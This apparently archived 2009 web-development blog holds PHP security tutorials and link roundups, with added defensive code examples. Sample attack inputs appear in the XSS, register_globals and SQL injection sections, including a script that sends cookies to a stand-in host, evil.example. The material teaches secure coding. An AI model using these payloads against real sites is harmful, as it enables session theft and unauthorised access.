Disabling Right Click (context menu) with jQuery

November 14th, 2009

There are a lot of JavaScript snippets for disabling right click on web pages. jQuery makes it a lot easier (bear in mind this only hides the browser's context menu; it is not a protection and stops nobody from viewing the source or saving images):

$(document).ready(function () {
    // Returning false from the contextmenu handler suppresses the browser's
    // right-click menu. On jQuery 1.7+ .on('contextmenu', ...) is the equivalent.
    $(document).bind('contextmenu', function (e) {
        return false;
    });
});



Website Statistics Script

November 13th, 2009

Hope it will be helpful to you guys…

Click here:

http://codes.myfreewares.com/php/utilities/php%20script/website%20Usage%20statistics%20script.php-file.htm


How to build a Social Networking Website with Drupal

November 12th, 2009

With this article I want to explain how you can plan and build a social networking website using Drupal. The intent of the post is to provide useful tips and information for understanding the issues behind building a working online community. This writing was inspired by reading two interesting books, Community Building on the Web: Secret Strategies for Successful On-line Community and Drupal 6 – Social Networking. It's clear that in a post I can provide only some useful cues for doing a good job. I suggest reading the books mentioned above if you want to know more about the techniques and best practices for developing a good web network service.

Tutorial Link:

http://woorkup.com/2009/11/10/how-to-build-a-social-networking-website-with-drupal/


Using htaccess Files for Pretty URLS

November 6th, 2009

A NETTUTS tutorial on “pretty URLs” and how you can make them happen on your site by combining a bit of htaccess/mod_rewrite magic with PHP.

“While some claim pretty URLs help in search engine rankings (the debate here is fierce), we can all agree that pretty URLs make things easier for our users and add a level of professionalism and polish to any web application”

To illustrate how it works, they build a simple URL shortening site, showing the two pieces (Apache's htaccess rewrite rules and PHP's handling of the rewritten request) along the way. The application is pretty simple: store a URL in a MySQL database and look it up via a short hash taken from the requested URL.
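The redirect side of such a shortener, as an added example that is not the tutorial's own code. It assumes a rewrite rule in .htaccess that sends /abc123 to index.php?hash=abc123 (the rule, the table layout and the connection details are assumptions for illustration) and needs PHP 7.1 or later. The point a shortener tutorial usually skips is that the hash must be re-validated in PHP (index.php?hash=... can be requested directly, bypassing the rewrite rule) and that the stored target must be checked before it is used in a Location header, or the site becomes an open redirector.

```php
<?php
// Added example, not the tutorial's code. Assumed .htaccess in the web root:
//
//   RewriteEngine On
//   RewriteCond %{REQUEST_FILENAME} !-f
//   RewriteCond %{REQUEST_FILENAME} !-d
//   RewriteRule ^([A-Za-z0-9]{1,10})$ index.php?hash=$1 [L]
//
// Assumed table: urls(hash VARCHAR(10) PRIMARY KEY, target TEXT)

function lookupTarget(PDO $db, string $hash): ?string
{
    // Whitelist the hash here as well: the rewrite rule constrains it, but
    // index.php?hash=... can be requested directly with anything in it.
    if (!preg_match('/^[A-Za-z0-9]{1,10}$/', $hash)) {
        return null;
    }
    // Prepared statement: the hash never becomes part of the SQL text.
    $stmt = $db->prepare('SELECT target FROM urls WHERE hash = ?');
    $stmt->execute([$hash]);
    $target = $stmt->fetchColumn();
    return $target === false ? null : $target;
}

function isSafeRedirectTarget(string $url): bool
{
    // Only absolute http(s) URLs are redirected; javascript:, data:,
    // protocol-relative and malformed values are refused even if they
    // somehow reached the table. CR/LF would be header injection.
    if (preg_match('/[\r\n]/', $url)) {
        return false;
    }
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return false;
    }
    return in_array(strtolower($parts['scheme']), ['http', 'https'], true);
}

$db = new PDO('mysql:host=localhost;dbname=shortener;charset=utf8mb4', 'user', 'password', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);

$target = lookupTarget($db, $_GET['hash'] ?? '');

if ($target === null || !isSafeRedirectTarget($target)) {
    http_response_code(404);
    exit('Unknown short URL');
}

header('Location: ' . $target, true, 302);
exit;
```

The same isSafeRedirectTarget() check belongs on the insert path too, so that only http(s) targets ever get stored; checking at both ends costs nothing and means a bad row in the table still cannot be turned into a redirect.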

You can get Guide/Code here:

http://net.tutsplus.com/tutorials/other/using-htaccess-files-for-pretty-urls/

Hope it would be helpful.


Three Important Tips to Write PHP Code Defensively

November 6th, 2009

The phenomenal growth of PHP applications has brought a matching growth in malicious activity against them. It is therefore imperative that you write secure PHP code to protect your website. Here are some tips for doing so.

The three areas of PHP code most often exposed to attack are cross-site scripting (XSS), global variables and SQL.

XSS

XSS turns up wherever user-supplied text is written back into a page, and a comment section is the classic case. If commenters have to log in, their session identifier is kept in a cookie. If a comment can contain HTML and is echoed back unescaped, any script inside it runs in the browser of every visitor who views the page, with that visitor's cookies in scope, and there is a pretty good chance those cookies end up at a remote server run by the attacker.

To counter this, make a habit of filtering every piece of input you receive. Reject the request (die() or an error page) whenever the filter finds input that does not qualify. What the user typed is validated first and only then stored in the website's database, and it is escaped again when it is output.

<?php
// Output escaping: whatever the user typed is shown as text, not interpreted
// as HTML. ENT_QUOTES escapes both quote styles (needed inside attributes) and
// the explicit charset avoids encoding-based bypasses.
echo 'this is what you input: ';
echo htmlentities($_POST['myInfo'] ?? '', ENT_QUOTES, 'UTF-8');
?>
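The comment-section scenario from above worked through, as an added example that is not from the original post: the same hostile comment rendered unsafely and safely, input validation that rejects rather than repairs, and the session cookie flags that limit what a successful XSS can steal. The attacker's comment and the function names are constructed for illustration; the array form of session_set_cookie_params() needs PHP 7.3 or later.

```php
<?php
// Added example, not from the original post.

// Constructed attacker input: a comment that tries to ship document.cookie
// to a server the attacker controls.
$comment = '<script>new Image().src="http://evil.example/?c="+document.cookie</script>';

function renderUnsafe(string $text): string
{
    // VULNERABLE: raw user input is written straight into the page, so the
    // script above runs in every visitor's browser.
    return '<div class="comment">' . $text . '</div>';
}

function e(string $text): string
{
    // Escape for an HTML text node or attribute value. ENT_QUOTES covers both
    // ' and ", ENT_SUBSTITUTE keeps invalid byte sequences from blanking the
    // output, and the explicit charset avoids charset-confusion bypasses.
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderSafe(string $text): string
{
    // The browser now shows the script tag as text instead of executing it.
    return '<div class="comment">' . e($text) . '</div>';
}

function validateComment(string $text): ?string
{
    // Validate on input: length and encoding. Reject, do not "clean up", so
    // the database only ever holds values that passed the check.
    $text = trim($text);
    if ($text === '' || !mb_check_encoding($text, 'UTF-8')) {
        return null;
    }
    if (mb_strlen($text, 'UTF-8') > 2000) {
        return null;
    }
    return $text;
}

// Before session_start(): HttpOnly keeps the cookie out of document.cookie,
// so even a script that does run cannot read it; Secure keeps it off plain
// HTTP; SameSite=Lax limits cross-site requests carrying it.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);
session_start();

$stored = validateComment($comment);
if ($stored === null) {
    http_response_code(400);
    exit('Comment rejected');
}

// renderUnsafe($stored) is what the vulnerable site does; only the escaped
// version is sent to the browser here.
echo renderSafe($stored), "\n";
```

Note that the comment passes validateComment(): it is well-formed UTF-8 of sensible length, and there is nothing wrong with a user typing the literal text "<script>". That is why escaping on output is the control that matters for XSS, and validation on input is there to keep junk out of the database, not to catch HTML.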

Global Variables

The PHP feature register_globals is a palpable hole in programming safety. With it enabled in php.ini, every request parameter (GET, POST, cookie) becomes a PHP variable of the same name, so a single uninitialized variable can turn into a serious security flaw. For instance

<?php
// Deliberately vulnerable: $authorized is never initialized, so with
// register_globals on, a request carrying ?authorized=1 sets it before
// this code runs.
if (is_admin()) { $authorized = true; }
if ($authorized) { include "/very/sensitive/data.php"; }
?>

When this runs with register_globals on, a request for the script with ?authorized=1 in the URL creates $authorized = "1" before the first line executes, so is_admin() never matters and anyone reaches the administrative include! To counter this, disable register_globals (it has been off by default since PHP 4.2.0 and was removed altogether in PHP 5.4), initialize every variable before you use it, and keep variables in the narrowest scope you can.
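Current PHP has no register_globals to switch on, but extract() over a request array reproduces exactly the same behaviour, so the following added example (not from the original post) uses it to show the hole and the fix side by side. The is_admin() stub and the request array are constructed for the demonstration.

```php
<?php
// Added example, not from the original post. extract() on request data
// behaves like register_globals=On: every key becomes a variable.

function is_admin(): bool
{
    // Stand-in for the page's is_admin(): nobody is admin in this demo, so a
    // correct check must always deny.
    return false;
}

function checkVulnerable(array $request): bool
{
    extract($request);              // creates $authorized = "1" from the request
    if (is_admin()) { $authorized = true; }
    return !empty($authorized);     // attacker-controlled
}

function checkFixed(array $request): bool
{
    $authorized = false;            // initialized before any use
    if (is_admin()) { $authorized = true; }
    // Request data is read explicitly ($request['...']) if it is needed at
    // all; it never gets to choose variable names in this scope.
    return $authorized;
}

// Constructed request: the attacker just appends ?authorized=1 to the URL.
$request = ['authorized' => '1'];

var_dump(checkVulnerable($request));
var_dump(checkFixed($request));
```

checkVulnerable() returns true for this request and would have gone on to the sensitive include; checkFixed() returns false whatever the request contains. The same applies to import_request_variables() and to extract($_GET) or extract($_POST) in any code you inherit: treat them as register_globals by another name.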

SQL Code

SQL is exposed to malicious users in just the same way as HTML output. To write secure SQL you need to remember two things: first, avoid building queries dynamically from input; second, if a dynamic query is unavoidable, never put raw input into the query text.

For instance, code like this checks that the account number is present and well-formed before a database connection is even opened:

if ($_POST['submit'] == 'Save') {
   if (isset($_POST['acct_num']) &&
       isValidAccountNumber($_POST['acct_num'])) {   // same key in both checks
        // mysql_connect() belongs to the old mysql extension (removed in
        // PHP 7); use mysqli or PDO in current code.
        $link = mysql_connect ('hostname', 'user', 'password')
              or die('Could not connect to DB');
        ...
   }
}

Check each field against what its column is supposed to hold (a user name field accepts only names of the expected form, so junk like “bingo” or ‘blah blah’ is rejected straight away). A simple way to close a lot of SQL holes is typecasting: cast numeric input with (int) or (float) before it gets near the query and no SQL can ride along with it. For string values you can use mysql_real_escape_string() (with an open connection, so it knows the connection's character set); it escapes quotes, backslashes, NUL bytes and line breaks so the value cannot break out of its quotes. Note that it only helps for values that are quoted in the query: for unquoted numbers, column names or ORDER BY clauses it does nothing, which is one more reason to prefer prepared statements (mysqli or PDO), where the data never becomes part of the SQL text at all.
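The three techniques named above (whitelist validation, typecasting, escaping) beside a prepared statement, as an added example that is not from the original post. The accounts table, the account-number rule and the attacker inputs are constructed for the demonstration.

```php
<?php
// Added example, not from the original post. Assumed table:
// accounts(acct_num INT, name VARCHAR(64), ...)

function isValidAccountNumber(string $v): bool
{
    // Whitelist: 6 to 12 digits (rule assumed for the demo). Anything else,
    // including "1 OR 1=1", fails here and never reaches the database.
    return (bool) preg_match('/^\d{6,12}$/', $v);
}

function naiveQuery(string $acct, string $name): string
{
    // VULNERABLE: input concatenated into the SQL text. Note that acct_num is
    // unquoted, so escaping $acct would not have helped at all.
    return "SELECT * FROM accounts WHERE acct_num = $acct AND name = '$name'";
}

function findAccount(PDO $db, string $acct, string $name): ?array
{
    if (!isValidAccountNumber($acct)) {
        return null;                       // reject, do not repair
    }
    $acctInt = (int) $acct;                // typecast: an int cannot carry SQL

    // Prepared statement: the values travel separately from the query text,
    // so quoting, escaping and the unquoted-number case are all taken care of.
    $stmt = $db->prepare('SELECT * FROM accounts WHERE acct_num = ? AND name = ?');
    $stmt->execute([$acctInt, $name]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed attacker input: the first payload needs no quote character.
$acct = '1 OR 1=1';
$name = "x' OR '1'='1";

echo naiveQuery($acct, $name), "\n";

$db = new PDO('mysql:host=localhost;dbname=bank;charset=utf8mb4', 'user', 'password', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepares
]);

var_dump(findAccount($db, $acct, $name));       // rejected by the whitelist
var_dump(findAccount($db, '123456', $name));    // runs with bound parameters
```

Printing naiveQuery() shows why the text insists on typecasting as well as escaping: the account-number payload contains no quote at all, so an escaping function has nothing to escape, and only casting to int (or binding it as a parameter) removes it. Setting PDO::ATTR_EMULATE_PREPARES to false, together with the charset in the DSN, makes sure the server and not the client does the parameter handling.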

These three are the most significant to create a secure PHP code. Apart from this, you should also ensure that

  • The system is well protected
  • Files and database are protected.
  • Posts are verified
  • Input is always validated

Input validation is the key to secure programming. Make a habit of allowing only the right input into your system. A systematic approach to PHP, keeping in mind the pitfalls, can guard the program against most flaws and malicious attacks.


Top 25 Most Dangerous Programming Errors

November 6th, 2009


It's a list generated by CWE/SANS of what they consider to be the twenty-five most dangerous errors you can commit in your application development (PHP related or not):

“The document lists the most common and significant programming errors which can lead to serious software vulnerabilities. [...] The 25 vulnerabilities are divided into three main categories: Insecure Interaction Between Components, Risky Resource Management and Porous Defenses, details of which are listed below”

Some of the items in the list include:

  • Insecure Interaction Between Components – Failure to Preserve SQL Query Structure ('SQL Injection')
  • Risky Resource Management – External Control of Critical State Data
  • Porous Defenses – Execution with Unnecessary Privileges
  • Insecure Interaction Between Components – Cross-Site Request Forgery (CSRF)
  • Porous Defenses – Use of a Broken or Risky Cryptographic Algorithm

You can see the full list here, including explanations for each.

http://cwe.mitre.org/top25/index.html

Extremely useful PHP classes

November 6th, 2009

10 extremely useful PHP classes. Hope it will be helpful to you guys…


PHP PSD Reader

A PHP class that lets you display any Adobe PSD file on screen. Very useful for creating previews of PSDs designed for clients, for example.
Download :

http://www.phpclasses.org/browse/package/3627.html


Browser detect

One of the most common (and boring) problems for front-end developers is definitely cross-browser compatibility. This PHP class detects almost all browsers and simplifies your cross-browser work.
Download :

http://www.phpclasses.org/browse/package/2827.html


Akismet

Remember those days without spam? If your website gets spammed in any way, Akismet can probably help you. When a new comment, trackback or pingback comes to your site, it is submitted to the Akismet web service, which runs hundreds of tests on the comment and returns a thumbs up or thumbs down.
Download:

http://phpclasses.linuxpourtous.com/browse/package/4401.html


ADOdb

The large majority of websites and web apps use databases to store all kinds of data. ADOdb is a database abstraction library for PHP, supporting MySQL, PostgreSQL, Interbase, Firebird, Oracle, MS SQL and more. ADOdb is quite easy to learn and has lots of nice features, such as extensive portability support, speed and BSD licensing.
Download :

http://adodb.sourceforge.net/


HTML Purifier

As its name says, HTML Purifier is a PHP library that cleans HTML: it removes malicious markup (script elements, event-handler attributes, javascript: links and so on) by keeping only a whitelist of allowed elements and attributes, and makes sure the result is standards-compliant. A great tool for any developer who has to accept HTML from users.
Download:

http://htmlpurifier.org/
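How it is used in practice, as an added example that is not part of the original list. It assumes HTML Purifier is installed through Composer (package ezyang/htmlpurifier) so that the autoloader is available; the hostile comment is constructed.

```php
<?php
// Added example, not from the original list. Assumes a Composer install of
// ezyang/htmlpurifier.
require 'vendor/autoload.php';

function makeCommentPurifier(): HTMLPurifier
{
    $config = HTMLPurifier_Config::createDefault();
    // Whitelist, not blacklist: only these elements and attributes survive, so
    // unknown tags, on* event handlers and style attributes are all dropped.
    $config->set('HTML.Allowed', 'p,br,b,i,em,strong,a[href],ul,ol,li');
    // Only web links in href: javascript:, data: and vbscript: URLs are removed.
    $config->set('URI.AllowedSchemes', ['http' => true, 'https' => true]);
    return new HTMLPurifier($config);
}

// Constructed hostile comment: a script element, an inline event handler and a
// javascript: link, mixed with legitimate markup that should be kept.
$dirty = '<p onmouseover="alert(1)">Hi <b>there</b>, see '
       . '<a href="javascript:alert(document.cookie)">this</a> and '
       . '<a href="https://example.org/">that</a>.</p>'
       . '<script>new Image().src="http://evil.example/?"+document.cookie;</script>';

$clean = makeCommentPurifier()->purify($dirty);
echo $clean, "\n";
```

The output keeps the paragraph, the bold text and the https link, while the script element, the onmouseover handler and the javascript: href are gone, and the result is well-formed HTML. This is a different job from escaping with htmlspecialchars(): escape when the user's text should never be HTML at all, and reach for a purifier only when a subset of markup genuinely has to be allowed.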


Google charts API

Charts are very useful and highly asked by clients, but they can be a lot of work. I remember some years ago when a friend of mine had to create charts using Photoshop every week for one of his clients. Well, this time is gone for good.
With the Google charts API, a simple chart can be created and displayed on screen using as little as 4 lines of code.
Download:

http://luddep.se/notebook/2008/04/13/charts-php-and-google-charts-api/


pChart

pChart is another chart class, and it is as good as Google charts API. Data can be easily retrieved from SQL queries, CSV files, or manually provided.
Download:

http://pchart.sourceforge.net/index.php


PHP Excel

Excel documents are highly popular in the corporate world. Considering that fact, there’s a strong chance that one of your clients asks for you to create excel files in PHP someday.
Happily, the PHP Excel engine allows you to easily create and manipulate lots of different file types, such as Excel 2007, Open XML and PDF.
Download:

http://www.codeplex.com/PHPExcel


Country from IP

Some websites detect your location and automatically display information in your language. How do they do that? Quite simply, they use your IP address to find your location. The Country from IP class is easy to use and will give you the country a specific IP belongs to.
Download:

http://phpclasses.linuxpourtous.com/browse/package/2363.html


Cache Manager

If you're working on a high-traffic site, there's no doubt you'll need to cache files to improve performance. This is easy and simple to do with this very handy class. A definite must-have, in my opinion.
Download:

http://phpclasses.linuxpourtous.com/browse/package/2860.html


WPGet

As I know many of you have a WordPress blog, I just can’t finish this article without a great tool for our favorite blogging engine.
WPGet is a PHP class which allows you to easily get information from a WordPress 2.X database. In other words, it lets you show posts, comments and so on from a WordPress blog on a non-WordPress site. Great, isn't it?
Download:

http://phpclasses.linuxpourtous.com/browse/package/3328.html



Getting Clean With PHP

November 6th, 2009

New from NETTUTS.com today there’s an article that both reminds PHP developers of the importance of filtering data and gives them a long list of the filters that PHP has to make it easy.

Data security is important and often undervalued by designers, developers, and clients alike. Since PHP 5.2.0, data sanitization and validation has been made significantly easier with the introduction of data filtering. Today, we’re going to take a closer look at these filters, how to use them, and build a few custom functions.

They talk about filtering out cross-site scripting, SQL injection and “improper” data in your submissions. They look at the filter extension and how filter_var() can be used with a long list of filter types to check the validity of your data (FILTER_VALIDATE_EMAIL, FILTER_VALIDATE_IP, FILTER_SANITIZE_STRING and FILTER_SANITIZE_URL, among others), and briefly mention custom functions for validating more complex data sets. Two things to keep in mind when using it: the validate filters return false on failure, so test the result with === rather than as a boolean, and FILTER_SANITIZE_STRING has been deprecated since PHP 8.1, so prefer validating on input and escaping on output with htmlspecialchars().
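The filter extension run over a constructed request, as an added example that is not the article's code: validate filters with options and flags, the false-versus-null failure signal, the scheme check FILTER_VALIDATE_URL does not do for you, and a custom rule through FILTER_CALLBACK. The field names and the user-name rule are assumptions for the demonstration.

```php
<?php
// Added example, not the article's code.

function validateRequest(array $input): array
{
    $errors = [];
    $clean  = [];

    // Validate filters return false when the value does not qualify, so the
    // result must be compared with === false, never used as a boolean.
    $email = filter_var($input['email'] ?? '', FILTER_VALIDATE_EMAIL);
    if ($email === false) { $errors[] = 'email'; } else { $clean['email'] = $email; }

    // Public IPv4 only: private and reserved ranges are rejected by the flags.
    $ip = filter_var($input['ip'] ?? '', FILTER_VALIDATE_IP,
        FILTER_FLAG_IPV4 | FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE);
    if ($ip === false) { $errors[] = 'ip'; } else { $clean['ip'] = $ip; }

    // Integer with a range; on success the result is an int, not the string.
    $age = filter_var($input['age'] ?? '', FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => 150]]);
    if ($age === false) { $errors[] = 'age'; } else { $clean['age'] = $age; }

    // Booleans: "off", "no" and "0" are valid false values, so failure has to
    // be signalled as null instead of false.
    $flag = filter_var($input['flag'] ?? '', FILTER_VALIDATE_BOOLEAN, FILTER_NULL_ON_FAILURE);
    if ($flag === null) { $errors[] = 'flag'; } else { $clean['flag'] = $flag; }

    // FILTER_VALIDATE_URL checks syntax, not the scheme, so an ftp:// link
    // passes it; whitelist the scheme yourself.
    $url = filter_var($input['url'] ?? '', FILTER_VALIDATE_URL);
    if ($url === false
        || !in_array(strtolower((string) parse_url($url, PHP_URL_SCHEME)), ['http', 'https'], true)) {
        $errors[] = 'url';
    } else {
        $clean['url'] = $url;
    }

    // Custom rule for data the built-in filters do not cover (user names,
    // rule assumed): the callback returns the value on success, false otherwise.
    $user = filter_var($input['user'] ?? '', FILTER_CALLBACK, ['options' => function ($v) {
        return preg_match('/^[a-z][a-z0-9_]{2,31}$/', $v) ? $v : false;
    }]);
    if ($user === false) { $errors[] = 'user'; } else { $clean['user'] = $user; }

    return ['clean' => $clean, 'errors' => $errors];
}

// Constructed request: email and user are fine, the other four should be rejected.
$result = validateRequest([
    'email' => 'alice@example.org',
    'ip'    => '10.0.0.5',              // private range
    'age'   => '200',                   // out of range
    'flag'  => 'maybe',                 // not a boolean
    'url'   => 'ftp://files.example.org/',
    'user'  => 'alice',
]);

print_r($result);
```

Collecting every failure into $errors rather than dying on the first one is a small design choice that pays off in forms: the user sees all the problems at once, and nothing from the request reaches $clean unless its own filter accepted it.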

Click here to view the article:


http://net.tutsplus.com/tutorials/php/getting-clean-with-php/


CSS Differences in Internet Explorer 6, 7 and 8

November 6th, 2009

“CSS Differences in Internet Explorer 6, 7 and 8”.
Hope it will be helpful to you guys… mostly designers.

Click here:

http://www.smashingmagazine.com/2009/10/14/css-differences-in-internet-explorer-6-7-and-8/


Pagination Gallery: Examples and Good Practices

November 6th, 2009

“Pagination Gallery: Examples and Good Practices”.
Hope it will be helpful to you guys…

Click here:

http://www.smashingmagazine.com/2007/11/16/pagination-gallery-examples-and-good-practices/